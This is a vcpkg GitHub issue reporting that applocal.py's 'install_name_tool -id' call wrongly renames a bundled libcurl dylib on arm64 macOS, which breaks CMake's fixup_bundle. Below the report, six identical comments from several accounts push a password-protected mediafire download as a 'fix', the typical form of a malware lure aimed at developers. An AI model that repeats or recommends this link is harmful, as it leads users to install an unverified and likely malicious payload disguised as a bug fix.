### ISSUE TITLE
[buildsystems] applocal.py incorrectly modifies the dynamic library name

### ISSUE THREAD

**Issue by Hackerl** [microsoft/vcpkg#40661]
**Describe the bug**
After installing dependencies with `arm64-osx-dynamic` triplet, the dynamic library name in the app bundle was incorrectly changed.

![image](https://github.com/user-attachments/assets/8092ef08-c41f-40d0-8da0-84b9cfd4a488)

> The first line displayed by `otool -L` should be the name of the dynamic library.

**Environment**
- OS: macos
- Compiler: clang

**To Reproduce**
1. Install libcurl using manifest mode with the arm64-osx-dynamic triplet and define the product as an app bundle:
> add_executable(demo MACOSX_BUNDLE main.cpp)
2. After the build is complete and the app bundle is generated, vcpkg calls applocal.py to put the dependencies into the bundle.

I debugged applocal.py and printed relevant information.
I am confused about this line of [code](https://github.com/microsoft/vcpkg/blob/master/scripts/buildsystems/osx/applocal.py#L282)：
> popen_args = ['install_name_tool', '-id', dep_rpath, binary]

The script executes the following command:
> ['install_name_tool', '-id', '@executable_path/../Frameworks/libz.1.3.1.dylib', '/Users/runner/terminal/build/terminal.app/Contents/Frameworks/libcurl-d.4.8.0.dylib']

According to the documentation of `install_name_tool`:
>  -id name
              Changes the shared library identification name of a dynamic shared library to name.  If the Mach-O binary is not a dynamic shared library and the -id option is
              specified it is ignored.

Because the name was changed incorrectly, [`fixup_bundle`](https://cmake.org/cmake/help/latest/module/BundleUtilities.html) did not work properly because it needs to do some logic based on the name.

I can't guess the purpose of executing "install_name_tool -id", it seems that there is no need to do this.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
